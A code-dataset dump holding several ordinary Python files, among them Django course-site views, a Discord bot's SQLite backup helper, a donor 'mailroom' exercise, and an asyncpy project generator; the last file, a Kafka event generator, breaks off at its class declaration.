blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
281
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
57
| license_type
stringclasses 2
values | repo_name
stringlengths 6
116
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 313
values | visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 18.2k
668M
⌀ | star_events_count
int64 0
102k
| fork_events_count
int64 0
38.2k
| gha_license_id
stringclasses 17
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 107
values | src_encoding
stringclasses 20
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 4
6.02M
| extension
stringclasses 78
values | content
stringlengths 2
6.02M
| authors
listlengths 1
1
| author
stringlengths 0
175
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
013f62d1095057fe79083d89f83110ecb8c70f3f
|
dc99d95671170444cd7bf02e37da6ecda4a5f19e
|
/apps/courses/views.py
|
744bef09fd1699bd93842b7c1d3d4a04ab7d3ca9
|
[] |
no_license
|
bbright3493/python_real_war
|
734d49ed9f7e1800d24dc754424a07b69d7d8c1f
|
6e43bb7d814920222f3310bd6fd9f04cb3d5bbf1
|
refs/heads/master
| 2020-03-30T06:08:40.249185
| 2018-10-22T07:33:41
| 2018-10-22T07:33:41
| 150,841,381
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 24,305
|
py
|
# -*- coding: utf-8 -*-
import json
from django.shortcuts import render, HttpResponse
from django.views.generic.base import View
from pure_pagination import Paginator, EmptyPage, PageNotAnInteger
from utils.mixin_utils import LoginRequiredMixin
from .models import Course, Lesson, ChoiceQuestion, Video, ProgramQuestion, ChoiceBank, ProgramUpload, CourseCategory, \
Faq
from .models import CourseDirection, KnowledgePoint
from article.models import Article
from operation.models import UserCourse, UserPass, UserErrorChoice
from integral.models import UserIntergral, IntergralDemand
from .forms import ProgramUploadForm
from project.models import ProjectShow
# Create your views here.
class CourseListView(View):
"""
课程列表页
"""
def get(self, request):
all_category = CourseCategory.objects.all()
all_direction = CourseDirection.objects.all()
click_direction = request.GET.get("direction", "all")
click_category = request.GET.get("category", "all")
click_degree = request.GET.get("degree", "all")
click_sort = request.GET.get("sort", "new")
print(click_direction)
if click_direction == "all":
if click_category == "all":
if click_degree == "all":
all_course = Course.objects.all().order_by("-add_time")
if click_sort == "hot":
all_course = Course.objects.all().order_by("-students")
else:
all_course = Course.objects.filter(degree=click_degree).order_by("-add_time")
if click_sort == "hot":
all_course = all_course.order_by("-students")
else:
if click_degree == "all":
all_course = Course.objects.filter(coursecategory__category=click_category).order_by("-add_time")
if click_sort == "hot":
all_course = all_course.order_by("-students")
else:
all_course = Course.objects.filter(coursecategory__category=click_category,
degree=click_category).order_by("-add_time")
if click_sort == "hot":
all_course = all_course.order_by("-students")
else:
all_course = Course.objects.filter(direction=click_direction)
print("all:", all_course)
if click_category == "all":
if click_degree == "all":
all_course = all_course.order_by("-add_time")
if click_sort == "hot":
all_course = all_course.order_by("-students")
else:
all_course = all_course.filter(degree=click_degree).order_by("-add_time")
if click_sort == "hot":
all_course = all_course.order_by("-students")
else:
if click_degree == "all":
all_course = all_course.filter(coursecategory__category=click_category).order_by("-add_time")
if click_sort == "hot":
all_course = all_course.order_by("-students")
else:
all_course = all_course.filter(coursecategory__category=click_category,
degree=click_category).order_by("-add_time")
if click_sort == "hot":
all_course = all_course.order_by("-students")
try:
page = request.GET.get('page', 1)
except PageNotAnInteger:
page = 1
p = Paginator(all_course, 6, request=request)
courses = p.page(page)
print(type(courses))
print("session:", request.session.get('Linux', default="Html"))
return render(request, 'course_list.html', {
"all_direction": all_direction,
"all_course": courses,
"all_category": all_category,
"click_direction": click_direction,
"click_category": click_category,
"click_degree": click_degree,
"click_sort": click_sort,
})
class CourseLevelView(View):
"""
课程关卡列表页
显示关卡时同时查询用户关卡信息 需要显示用户对应关卡对学习情况
"""
def get(self, request, course_id):
course = Course.objects.get(id=int(course_id))
# 查询用户是否已经关联了该课程
try:
user_course = UserCourse.objects.get(user=request.user, course=course)
except:
user_course = UserCourse(user=request.user, course=course)
user_course.save()
students = UserCourse.objects.all().count()
course.students = int(students)
course.save()
all_level = Lesson.objects.filter(course=course_id).order_by("add_time")
this_level = Lesson.objects.filter(course=course_id).first()
# 对该课程对所有关卡 查询对应对用户关卡表 如果没有 则新建
for level in all_level:
try:
cur_user_level = UserPass.objects.get(user=request.user, lesson=level)
except:
cur_user_level = UserPass(user=request.user, lesson=level)
cur_user_level.save()
user_levels = UserPass.objects.filter(user=request.user, lesson__course=course).order_by("lesson")
# # 下一关关卡
# try:
# next_level = Lesson.objects.filter(course=course_id).order_by("add_time")[Level_num+1]
# except IndexError:
# next_level = Lesson.objects.filter(course=course_id).order_by("add_time")[Level_num]
#
# # 开通下一关关卡
# if this_level.pass_level:
# next_level.pass_level = True
last_level = Lesson.objects.filter(course=course_id).last()
projects = ProjectShow.objects.filter(course=course)
return render(request, 'course_level.html', locals())
class CourseDetailView(View):
"""
关卡详情页
"""
def get(self, request, course_id, lesson_id):
course = Course.objects.get(id=course_id)
# 查询用户课程状态 如果是未学习 则将状态改为正在学习
user_course = UserCourse.objects.get(user=request.user, course=course)
if user_course.study_status == 1:
user_course.study_status = 2
user_course.save()
lesson = Lesson.objects.get(id=lesson_id)
try:
user_lesson = UserPass.objects.get(user=request.user, lesson=lesson)
except:
user_lesson = UserPass(user=request.user, lesson=lesson)
user_lesson.save()
print(lesson)
# user_intergral = UserIntergral.objects.get(user=request.user)
extend_demand = IntergralDemand.objects.get(lesson_id=int(lesson_id), demand='extend_download')
# explain_demand = IntergralDemand.objects.get(lesson_id=int(lesson_id), demand='pro_explain')
all_vedio = Video.objects.filter(lesson_id=lesson_id)
all_article = Article.objects.filter(lesson=lesson).order_by('no')
choice_bank = lesson.get_choice_bank()
program_bank = lesson.get_program_bank()
faqs = Faq.objects.filter(lesson=lesson)
knowledge_points = KnowledgePoint.objects.filter(lesson=lesson)
lesson_projects = ProjectShow.objects.filter(lesson=lesson)
return render(request, 'course_detail.html', locals())
class ChoiceQuestionAnswerView(View):
"""
选择题题目
"""
def get(self, request, course_id, lesson_id, choice_id):
lesson_choices = ChoiceQuestion.objects.filter(lesson_id=int(lesson_id))
this_question = ChoiceQuestion.objects.get(id=choice_id)
all_question_num = ChoiceQuestion.objects.filter(lesson_id=int(lesson_id)).count()
is_last = False
if int(choice_id) == all_question_num:
is_last = True
return render(request, 'choice_answer.html', locals())
class ChoiceQuestionView(View):
"""
选择题题目
"""
def get(self, request, course_id, lesson_id, choice_id):
lesson_choices = ChoiceQuestion.objects.filter(lesson_id=int(lesson_id))
this_question = ChoiceQuestion.objects.get(id=choice_id)
all_question_num = ChoiceQuestion.objects.filter(lesson_id=int(lesson_id)).count()
print(all_question_num)
if int(this_question.question_num) == 1:
request.session['right_count'] = 0
request.session['error'] = []
is_last = False
if this_question.question_num == all_question_num:
is_last = True
next_question = this_question
else:
next_question = ChoiceQuestion.objects.get(question_num=this_question.question_num+1,
choicebank=this_question.choicebank)
return render(request, 'choice_pra.html', locals())
class NextQuestionView(View):
"""
下一题
"""
def post(self, request):
this_question = request.POST.get("practice_num", 1)
user_answer = request.POST.get("user_answer", "")
if int(user_answer) != -1:
# 得到本题的正确答案
right = ChoiceQuestion.objects.get(id=int(this_question))
right_answer = right.answer
if int(user_answer) + 1 == right_answer:
print("答对本题")
request.session['right_count'] = request.session.get('right_count', default=0) + 1
else:
print("本题错误")
l = request.session['error']
l.append(right.id)
request.session['error'] = l
user_pass = UserPass.objects.get(user=request.user, lesson=right.lesson)
# 判断是否第一次提交答案
if user_pass.choice_status == 0:
user_course = UserCourse.objects.get(user=request.user, course=right.lesson.course)
# 判断是否开通课程vip或者关卡vip
if user_course.course_status == 2 or user_pass.status == 2:
error_question = UserErrorChoice()
error_question.user = request.user
error_question.choice = right
error_question.user_answer = int(user_answer) + 1
error_question.save()
value = {"status": "success"}
print("session", request.session['right_count'])
return HttpResponse(json.dumps(value), content_type='application/json')
else:
return HttpResponse('{"status":"fail", "msg":"没有进行选择"}', content_type='application/json')
class ChoiceResultView(View):
"""
选择题结果
"""
def get(self, request, course_id, lesson_id):
right_nums = request.session.get('right_count', default=0)
user_errors = request.session.get('error', default=[])
errors = []
for error in user_errors:
errors.append(ChoiceQuestion.objects.get(id=int(error)))
print("right_nums:", right_nums)
all_question_num = ChoiceQuestion.objects.filter(lesson_id=int(lesson_id)).count()
print("all_num:", all_question_num)
right_rate = int(int(right_nums) / float(all_question_num) * 100)
print(right_rate)
lesson = Lesson.objects.get(id=lesson_id)
course = Course.objects.get(id=course_id)
# 保存提交状态 只有开通了vip的用户才修改该状态
user_pass = UserPass.objects.get(user=request.user, lesson=lesson)
user_course = UserCourse.objects.get(user=request.user, course=course)
if user_pass.choice_status == 0 and (user_pass.status == 2 or user_course.course_status == 2):
user_pass.choice_status = 1
user_pass.save()
return render(request, 'choice_result.html', locals())
class ProgramView(View):
"""
编程题
"""
def get(self, request, course_id, lesson_id, program_id):
# program_file = ProgramQuestion.objects.get(course=int(course_id), lesson=int(lesson_id), id=int(program_id))
program = ProgramQuestion.objects.get(id=program_id)
all_question_num = ProgramQuestion.objects.filter(program_bank=program.program_bank).count()
if int(program.question_num) == 1:
request.session['right_count_program'] = 0
request.session['error_program'] = []
is_last = False
#判断是否最后一题
if program.question_num == all_question_num:
is_last = True
next_program = program
else:
next_program = ProgramQuestion.objects.get(question_num=program.question_num+1, program_bank=program.program_bank )
try:
program_result = ProgramUpload.objects.get(programquestion_id=int(program_id), user=request.user)
except ProgramUpload.DoesNotExist:
program_result = ProgramUpload.objects.all()
print(program_result)
return render(request, 'program.html', locals())
class ProgramingView(View):
"""
编程题的编程页面
"""
def get(self, request, course_id, lesson_id, program_id):
# program_file = ProgramQuestion.objects.get(course=int(course_id), lesson=int(lesson_id), id=int(program_id))
program = ProgramQuestion.objects.get(id=program_id)
try:
program_result = ProgramUpload.objects.get(programquestion_id=int(program_id), user=request.user)
except ProgramUpload.DoesNotExist:
program_result = ProgramUpload.objects.all()
print(program_result)
return render(request, 'program_start.html', locals())
class ProgramingCommitView(View):
"""
代码提交的处理
"""
def post(self, request):
user_answer = request.POST.get("code", "")
program_id = request.POST.get("program_id", "")
print(user_answer)
program_question = ProgramQuestion.objects.get(id=int(program_id))
if program_question.result == user_answer:
value = {"status": "success", "result": "ok"}
else:
value = {"status": "success", "result": "error"}
return HttpResponse(json.dumps(value), content_type='application/json')
class NextProgramView(View):
"""
下一题
"""
def post(self, request):
this_question_num = request.POST.get("practice_num", 1)
this_question_id = request.POST.get("practice_id", 1)
result = request.POST.get("result", "")
this_program = ProgramQuestion.objects.get(id=this_question_id)
if int(result) == 1:
print("答对本题")
request.session['right_count_program'] = request.session.get('right_count_program', default=0) + 1
else:
print("本题错误")
l = request.session['error_program']
l.append(this_program.id)
request.session['error_program'] = l
value = {"status": "success"}
print("session", request.session['right_count_program'])
return HttpResponse(json.dumps(value), content_type='application/json')
class ProgramCommitView(View):
"""
编程题
"""
def get(self, request, course_id, lesson_id, program_id):
# program_file = ProgramQuestion.objects.get(course=int(course_id), lesson=int(lesson_id), id=int(program_id))
try:
program_result = ProgramUpload.objects.get(programquestion_id=int(program_id), user=request.user)
except ProgramUpload.DoesNotExist:
program_result = ProgramUpload.objects.all()
print(program_result)
return render(request, 'program-commit.html', {
# "program_file": program_file,
"program_result": program_result,
"program_id": program_id,
})
class ProgramUploadView(View):
"""
编程项目上传
"""
def post(self, request):
file_obj = request.FILES.get('file')
image_obj = request.FILES.get('image')
learned_obj = request.POST.get('learn')
programId_obj = request.POST.get('programId')
program = ProgramQuestion.objects.get(id=int(programId_obj))
# user = request.user
if file_obj and image_obj:
program_result = ProgramUpload()
program_result.programquestion = program
program_result.user = request.user
program_result.upload = file_obj
program_result.image = image_obj
program_result.learned = learned_obj
program_result.is_complete = True
program_result.save()
return HttpResponse('{"status":"success"}', content_type='application/json')
else:
return HttpResponse('{"status":"fail"}', content_type='application/json')
class ProgramResultView(View):
"""
编程题结果
"""
def get(self, request, course_id, lesson_id):
right_nums = request.session.get('right_count_program', default=0)
user_errors = request.session.get('error_program', default=[])
errors = []
for error in user_errors:
errors.append(ProgramQuestion.objects.get(id=int(error)))
errors = list(set(errors))
print("right_nums:", right_nums)
all_question_num = ProgramQuestion.objects.filter(lesson_id=int(lesson_id)).count()
print("all_num:", all_question_num)
right_rate = int(int(right_nums) / float(all_question_num) * 100)
print(right_rate)
lesson = Lesson.objects.get(id=lesson_id)
course = Course.objects.get(id=course_id)
return render(request, 'program_result.html', locals())
class PostView(View):
def post(self, request):
import time
import os
from programing import settings
file_obj = request.FILES.get('file')
image_obj = request.FILES.get('image')
if file_obj: # 处理附件上传到方法
request_set = {}
print('file--obj', file_obj)
# user_home_dir = "upload/%s" % (request.user.userprofile.id)
accessory_dir = settings.BASE_DIR
if not os.path.isdir(accessory_dir):
os.mkdir(accessory_dir)
upload_file = "%s/%s" % (accessory_dir, file_obj.name)
recv_size = 0
with open(upload_file, 'wb') as new_file:
for chunk in file_obj.chunks():
new_file.write(chunk)
order_id = time.strftime("%Y%m%d%H%M%S", time.localtime())
# cache.set(order_id, upload_file)
return HttpResponse(order_id)
class CompleteView(View):
"""
关卡完成
"""
def post(self, request):
course_id = request.POST.get("course_id", 1)
lesson_id = request.POST.get("lesson_id", 1)
print(type(int(course_id)), int(course_id))
this_lesson = Lesson.objects.get(course_id=int(course_id), id=int(lesson_id))
print(this_lesson)
this_lesson.pass_level = True
last_level = Lesson.objects.filter(course=int(course_id)).last()
print(last_level)
choice_bank = ChoiceBank.objects.get(lesson=int(lesson_id))
print(choice_bank)
program_question = ProgramQuestion.objects.get(lesson=int(lesson_id))
if choice_bank.is_complete == True and program_question.is_complete == True:
if int(lesson_id) != last_level.id:
next_level = Lesson.objects.filter(course=int(course_id)).order_by("-add_time")[int(lesson_id) + 1]
print("next:", next_level)
next_level.open_level = True
this_lesson.pass_level = True
this_lesson.save()
next_level.save()
else:
this_lesson.pass_level = True
this_lesson.save()
value = {"status": "success", "msg": "已完成"}
return HttpResponse(json.dumps(value), content_type='application/json')
else:
value = {"status": "fail", "msg": "你还没有完成全部任务"}
return HttpResponse(json.dumps(value), content_type='application/json')
# class ProjectShowView(View):
# """
# 项目展示
# """
#
# def get(self, request):
# all_category = CourseCategory.objects.all()
#
# click_category = request.GET.get("category", "all")
# click_course = request.GET.get("course", "all")
# click_level = request.GET.get("level", "all")
# all_level = Lesson.objects.filter(course__name=click_course)
#
# if click_category == "all":
# print("category:", click_category)
# all_project = ProgramUpload.objects.filter(is_show=True).order_by("-add_time")
# all_course = Course.objects.filter()
# else:
# all_course = Course.objects.filter(coursecategory__category=click_category)
# if click_course == "all":
#
# all_project = ProgramUpload.objects.filter(lesson__course__coursecategory__category=click_category,
# is_show=True)
# else:
# if click_level == "all":
#
# all_project = ProgramUpload.objects.filter(lesson__course__coursecategory__category=click_category,
# lesson__course__name=click_course,
# is_show=True)
# else:
#
# all_project = ProgramUpload.objects.filter(lesson__course__coursecategory__category=click_category,
# lesson__course__name=click_course,
# lesson__name=click_level,
# is_show=True)
# # 对课程进行分页
# try:
# page = request.GET.get('page', 1)
# except PageNotAnInteger:
# page = 1
#
# p = Paginator(all_project, 6, request=request)
# projects = p.page(page)
#
# return render(request, "project_show.html", {
# "all_category": all_category,
# "click_category": click_category,
# "all_course": all_course,
# "click_course": click_course,
# "all_level": all_level,
# "click_level": click_level,
# "projects": projects,
#
# })
# class ProjectResultView(View):
# """
# 项目展示结果
# """
#
# def get(self, request, lesson):
# try:
# program_result = ProgramUpload.objects.get(lesson__name=lesson, user=request.user)
# except ProgramUpload.DoesNotExist:
# program_result = ProgramUpload.objects.all()
# print(program_result)
# return render(request, "project_result.html", {
# "program_result": program_result
# })
class DownloadUrlView(View):
"""链接下载"""
def post(self, request):
course_id = request.POST.get("course_id", 1)
lesson_id = request.POST.get("lesson_id", 1)
type = request.POST.get("type", "")
user_intergral = UserIntergral.objects.get(user=request.user)
demand_intergral = IntergralDemand.objects.get(lesson_id=int(lesson_id), demand=type)
if user_intergral.grade >= demand_intergral.intergral:
user_intergral.grade = user_intergral.grade - demand_intergral.intergral
user_intergral.save()
demand_intergral.download_count += 1
demand_intergral.save()
value = {"status": "success", "re_url": demand_intergral.url}
return HttpResponse(json.dumps(value), content_type='application/json')
else:
value = {"status": "fail", "msg": "您的积分不足,请充值!"}
return HttpResponse(json.dumps(value), content_type='application/json')
|
[
"44704708@qq.com"
] |
44704708@qq.com
|
43b3dcc73cfdcbc4c2c4e592fd97bc7d88a60d21
|
fde6081d838481a2451e435d7ce1e8efd41d8c2c
|
/Util.py
|
4bdaced86fbd3fafe543135c25e5b4d54a20dc30
|
[] |
no_license
|
parthivpatel1106/SleepBot
|
b067bbf27275b4ab35136c912a167a411da57ad2
|
09979d273fa761da09201d5166bbbf3dc4819c01
|
refs/heads/main
| 2023-01-21T21:45:39.471169
| 2020-12-03T12:48:49
| 2020-12-03T12:48:49
| 318,178,217
| 0
| 0
| null | 2020-12-03T11:57:42
| 2020-12-03T11:57:42
| null |
UTF-8
|
Python
| false
| false
| 2,592
|
py
|
import discord
from discord.ext import commands
import asyncio
import os
import random
# For Database related stuff
import sqlite3
from dotenv import load_dotenv
from datetime import datetime
from datetime import date
POINT = {}
# Open and connect to Database File
conn = sqlite3.connect('Database.db')
c = conn.cursor()
c.execute("SELECT channel_ID FROM channel_table WHERE title='LOG';")
LOG = c.fetchone()
c.execute("SELECT user_id, points FROM point_table;")
DB_POINT = c.fetchall()
c.execute("SELECT channel_ID FROM channel_table WHERE title='POINT';")
POINTCMD = c.fetchone()
POINTCMD = int(POINTCMD[0])
def is_point_cmd_chnl():
def predicate(ctx):
return int(ctx.channel.id) == int(POINTCMD)
return commands.check(predicate)
conn.close()
# For Backup to Database
async def Backup(client):
await client.wait_until_ready()
global POINT
global DB_POINT
while not client.is_closed():
await client.get_channel(LOG[0]).send(f"Backup OK: ```{datetime.now()}```")
# Repeat every 1 hour
await asyncio.sleep(1800)
conn = sqlite3.connect('Database.db')
c = conn.cursor()
c.execute("SELECT user_id, points FROM point_table;")
DB_POINT = c.fetchall()
await client.get_channel(int(LOG[0])).send(f"Performing Backup: ```{datetime.now()}```")
# POINT BACKUP
for user in DB_POINT:
if user[0] in POINT:
c.execute("UPDATE point_table SET points = {} WHERE user_ID = {}".format(POINT[user[0]]+user[1],user[0]))
is_instance = False
for user in POINT:
for elm in DB_POINT:
if user in elm:
is_instance = True
break
if not is_instance:
c.execute("INSERT INTO point_table VALUES (NULL, {}, {});".format(user,POINT[user]))
is_instance = False
c.execute("SELECT user_ID, points FROM point_table;")
DB_POINT = c.fetchall()
conn.commit()
conn.close()
POINT = {}
# Function to log commands
async def command_log(client, ctx, cmd_name):
embed = discord.Embed(
title = "SleepBot Command Logs",
description = ("Command: {}\nMessage Content: {}".format(cmd_name, ctx.message.content)),
colour = random.randint(0, 0xffffff)
)
embed.add_field(name = "In Guild:", value = "{}".format(ctx.guild), inline = False)
embed.add_field(name = "In Channel:", value = "{} Channel_ID: {}".format(ctx.channel, ctx.channel.id), inline = False)
embed.add_field(name = "Author:", value = "{}, Nick: {}, ID: {}".format(ctx.author, ctx.author.nick, ctx.author.id), inline = False)
embed.add_field(name = "Time:", value = "{}".format(datetime.now()), inline = False)
await client.get_channel(LOG[0]).send(embed = embed)
|
[
"62468954+ZeusAbhijeet@users.noreply.github.com"
] |
62468954+ZeusAbhijeet@users.noreply.github.com
|
41edfbdd80492e88bc1f100c372ba51fd0c98a92
|
71788a22dcaeb2fbde56b87fabf7ee21df3a770f
|
/students/matthew_denko/lesson05/mailroom_pt3.py
|
4786a37f7981960ed69bbf09917b1619138c8d18
|
[] |
no_license
|
UWPCE-PythonCert-ClassRepos/Python210_Fall2019
|
5bdfc1c919666eccb42ee07a1d7e385b21f11652
|
e45481671684a3cc8a469461a15cd9f660752ee0
|
refs/heads/master
| 2020-08-05T16:33:53.068983
| 2019-12-29T09:57:59
| 2019-12-29T09:57:59
| 212,615,940
| 4
| 34
| null | 2019-12-29T09:58:00
| 2019-10-03T15:38:40
|
Python
|
UTF-8
|
Python
| false
| false
| 8,603
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Nov 12 06:34:53 2019
@author: matt.denko
"""
# pt 3 description ------------------------------------------------------------
"""Exceptions
Now that you’ve learned about exception handling, you can update your
code to handle errors better, such as when a user inputs bad data."""
"""Comprehensions
Can you use comprehensions to clean up your code a bit?
List comprehensions are designed for a very specific use case:
Processing a sequence of items to create another sequence."""
# importing packages ----------------------------------------------------------
import sys
import os
# Creating donor list----------------------------------------------------------
donors = dict()
"Convert main donor data structure to be a dict"
def new_donor(name, total=0, gifts=0, avg_gift=0):
"function to add new donor to dictionary - along with average gift, total gift, number of gifts"
if name not in donors:
"if donor not in original list then add it to list, if it already exists do nothing"
if gifts > 0:
"If gift value is 0 or less do not add - not a valid donation"
avg_gift = round(total/gifts, 2)
donors[name] = {'donation_total':round(total, 2), 'donation_ct':int(gifts), 'donation_avg':avg_gift}
def create_donors():
"function to create donor list, col1 - donor, col2 - average gift, col3 - number of gifts"
new_donor("Dennis Rodman", 1111, 1)
new_donor("Suge Knight", 2222.22, 2)
new_donor("Dumbledore", 33333.33, 3)
new_donor("Grizzly Adams", 44444, 1)
new_donor("Bob Evans", 555,2)
new_donor("Barron Trump", 66.55, 1)
# exit program ----------------------------------------------------------------
def exit_program():
"Creating a function to exit and stop program at any time"
print("Now exiting....goodbye\n")
"fixing from pt 1 - actually exiting :)"
sys.exit()
# Creating home screen text ---------------------------------------------------
home_screen_text = ("\nWelcome to the home screen please select one of option 1 through 3:\n"
"1: Make a Thank You\n"
"2: Make a Report\n"
"3: Make a letter\n"
"4: Exit\n")
def create_thank_you_note(name,amount):
"custom thank you note to automatically send the option is chose"
print(f"\nTo my dearest {name}:\n\n Thank you so much for your giant donation of ${amount}.",\
"We are extremely thankful for your donation.\n\n.")
# home screen function creation -----------------------------------------------
def home_screen(_):
"function to print text of home screen - unless an action is chosen"
while True:
print(home_screen_text)
action = input("")
if action in _:
_[action]()
if action == "exit":
"if action is exit chosen then break this function"
break
# creating custom thank you function ------------------------------------------
donor_new = ()
def make_thank_you():
""""Function to create custom thank you note for donor, the function also
prompts user to add a new donor and will add the donor to the existing
dictionary if it does not already exist"""
try:
user_text = ""
thank_you = """"To go to home screen please enter 'exit'.
\nType the name of a donor or type 'donors' to view list of donors\n"""
while user_text != "exit":
user_text = input(thank_you)
while user_text == "donors":
for name in donors:
print(name)
user_text = input(thank_you)
if user_text == "exit":
break
donation_amount = input("Please enter donation amount: ")
if donation_amount == "exit":
break
"new list comprehension"
donors_new = [new_donor(user_text) for _ in user_text if user_text not in donors]
"if the users input is a donor not in the current list then add it"
donors[user_text]['donation_total'] += float(donation_amount)
"total as a float"
donors[user_text]['donation_ct'] += 1
"count as an int"
donors[user_text]['donation_avg'] = donors[user_text]['donation_total']/donors[user_text]['donation_ct']
"avg will be a float due to dividing by float"
create_thank_you_note(user_text,donation_amount)
user_text = "q"
except ValueError as error:
"Adding exception handling for ValueError"
print('Please donate an actual amount of money....aka a float or int!')
donation_amount = input("Please enter donation amount: ")
"new list comprehension"
donors_new = [new_donor(user_text) for _ in user_text if user_text not in donors]
"if the users input is a donor not in the current list then add it"
donors[user_text]['donation_total'] += float(donation_amount)
"total as a float"
donors[user_text]['donation_ct'] += 1
"count as an int"
donors[user_text]['donation_avg'] = donors[user_text]['donation_total']/donors[user_text]['donation_ct']
"avg will be a float due to dividing by float"
create_thank_you_note(user_text,donation_amount)
user_text = "q"
finally:
"finally in case of double exception"
line1 = '\n lets start over...back to main menu....\n\n'
line2 = 'Please this time if you choose to make a thank you enter an integer or float in the amount!!!!!...\n\n '
lp = '\n'.join([line1, line2])
print(lp)
home_screen(home_screen_summary)
# making report ---------------------------------------------------------------
def make_report():
"""Function to create a custom report if the action is choosen by the user.
The report will contain the donation total, the count of donations, and the
average donation for each donor"""
output = sorted(donors.items(), key = lambda e: e[1]['donation_total'], reverse=True)
print("Donor Name"," Total Given - Num Gifts - Average Gift")
for item in output:
print("{:25} ${:>11.2f}{:>12d} ${:>12.2f}".format(item[0],
item[1]['donation_total'], item[1]['donation_ct'], item[1]['donation_avg']))
# letter prompt ---------------------------------------------------------------
def letter_prompt():
"function to create letter prompt for custom donor letters"
line1 = 'To my dearest and special friend {name},\n\n' \
+ 'Thank you for your awe inspiring donation of ${last:.2f}!'
line2 = 'With this latest personal sacrifice your lifetime donations total is ${total:.2f}!!!!!! ' \
+ 'Best Wishes,\n\nMatthew Denko, Decider of Things\n'
lp = '\n'.join([line1, line2])
"returning joined prompt"
return lp
# writing letters -------------------------------------------------------------
def make_letter():
"function to create custom letter files for each donor"
try:
"creating a new folder in the current working directory named thank_you_notes"
new_folder = os.mkdir(os.getcwd() + '//donationletters')
new_folder = os.getcwd() + '//donationletters'
except FileExistsError:
"exception in case file is already there"
new_folder = os.getcwd() + '//donationletters'
"loop to create note"
for i in donors:
donors2 = donors[i]
letter_details = {'name': i,
'last': donors2['donation_avg'],
'total': donors2['donation_total']}
file = new_folder + '//' + letter_details['name'].replace(' ', '_') + '.txt'
with open(file, 'w') as letter:
"using .format() method to produce the letter as one big template"
letter_note = letter_prompt()
letter.write(letter_note.format(**letter_details))
# home screen summary ---------------------------------------------------------
"See if you can use a dict to switch between the user’s selections"
home_screen_summary = {"1": make_thank_you, "2":make_report, "3":make_letter, "4":exit_program}
# if _name_ == '_main_' block -------------------------------------------------
if __name__ == '__main__':
"If this is the main file then execute these functions"
create_donors()
"create donors function generates donor list"
home_screen(home_screen_summary)
"""home screen function prints home_screen_summary which contains functions
for all of the menu prompts"""
|
[
"denkmatt@umich.edu"
] |
denkmatt@umich.edu
|
834db63d639b48b74456b466a1a37de5eec65799
|
c5a013595c7f5000d817c37f94db174751fba865
|
/asyncpy/asyncpy/__init__.py
|
fcbdb02e7bff8b3a5e36ea7fbc6107adceff159b
|
[
"MIT"
] |
permissive
|
Fenfenrao/asyncpy
|
c3b8d7ee5399f11e49c711d917fd8f9fd2b370d5
|
9c0b4ebe2f30cd4381c8cc0407f7dc98b1fd72c3
|
refs/heads/master
| 2022-07-28T20:08:43.063804
| 2020-05-25T05:05:21
| 2020-05-25T05:05:21
| 266,761,650
| 1
| 0
| null | 2020-05-25T11:28:34
| 2020-05-25T11:28:34
| null |
UTF-8
|
Python
| false
| false
| 1,620
|
py
|
# -*- coding: utf-8 -*-
"""Asyncpy
Usage:
asyncpy genspider <name>
asyncpy (-h | --help | --version)
Options:
--version Show version.
"""
from asyncpy.middleware import Middleware
from asyncpy.request import Request
from asyncpy.response import Response
from asyncpy.spider import Spider
from asyncpy.exceptions import IgnoreThisItem
from pathlib import Path
from docopt import docopt
__all__ = ["Middleware","Request","Response","Spider","IgnoreThisItem"]
VERSION = '1.1.5'
DEFAULT_ENCODING = 'utf-8'
import os
import shutil
def create_base(name):
template = 'templates'
template_path = Path(__file__).parent / template
project_path = os.path.join(os.getcwd(), name)
if not os.path.exists(project_path):
shutil.copytree(template_path, project_path)
os.rename(project_path,project_path)
spider_path = os.path.join(project_path, 'spiders/templates.py')
new_spider_path = os.path.join(project_path, 'spiders/{}.py'.format(name))
os.rename(spider_path,new_spider_path)
with open(file=new_spider_path,mode='r',encoding='utf-8')as f:
doc = f.read()
doc = doc.replace('templates',name).replace('Demo',name.capitalize())
with open(file=new_spider_path,mode='w',encoding='utf-8')as f1:
f1.write(doc)
print("Created successfully")
else:
print("file already exist")
def cli():
"""
Commandline for Asyncpy :d
"""
argv = docopt(__doc__, version=VERSION)
if argv.get('genspider'):
name = argv['<name>']
create_base(name=name)
|
[
"125066648@qq.com"
] |
125066648@qq.com
|
51930079a3309f6d30abe786051977a566ea742b
|
c9af07e4b045b897734f29ff1f8a211aa40d0822
|
/TextNook Assignment/reddit/blog/urls.py
|
2675016b19ebf5206ecfe6d1bc71d078d28d8538
|
[] |
no_license
|
vinyasmusic/Projects
|
20294e89c2905d5b5c54d21edb06f3076948051a
|
2dd1c05267b86d069a1185cd843e8a4d2bdf6123
|
refs/heads/master
| 2020-04-06T04:04:53.532872
| 2017-01-14T05:06:59
| 2017-01-14T05:06:59
| 58,999,243
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 257
|
py
|
from django.conf.urls import url
from . import views
from blog.views import PostListView
urlpatterns = [
#url(r'^$', views.post_list, name='post_list'),
url(r'^$',PostListView.as_view())
#url(r'^post/new/$', views.post_new, name='post_new'),
]
|
[
"vinyasmusic@gmail.com"
] |
vinyasmusic@gmail.com
|
5d0d6f69f6660e6ef026a817f19eea6376397f45
|
e9f9c70bf80bf95db4d323cfc7a019c30c55e04c
|
/Sapient Challenge/SapientChallenge/EventGenerator.py
|
040d0ed83078d0bb143b393b819c1df66128dcef
|
[] |
no_license
|
sidtandon2014/AnalyticsVidhya
|
1c19453e432147f0c75c636b995e0ce8e2d1c8d7
|
9e75578cb7edb0f552bd87da32021d17e9509a87
|
refs/heads/master
| 2021-06-24T03:52:28.880916
| 2020-12-16T14:55:36
| 2020-12-16T14:55:36
| 147,308,283
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,307
|
py
|
from kafka import KafkaProducer, KafkaClient
import csv
import json
import numpy as np
import time
from datetime import date
import pdb
class EventGenerator:
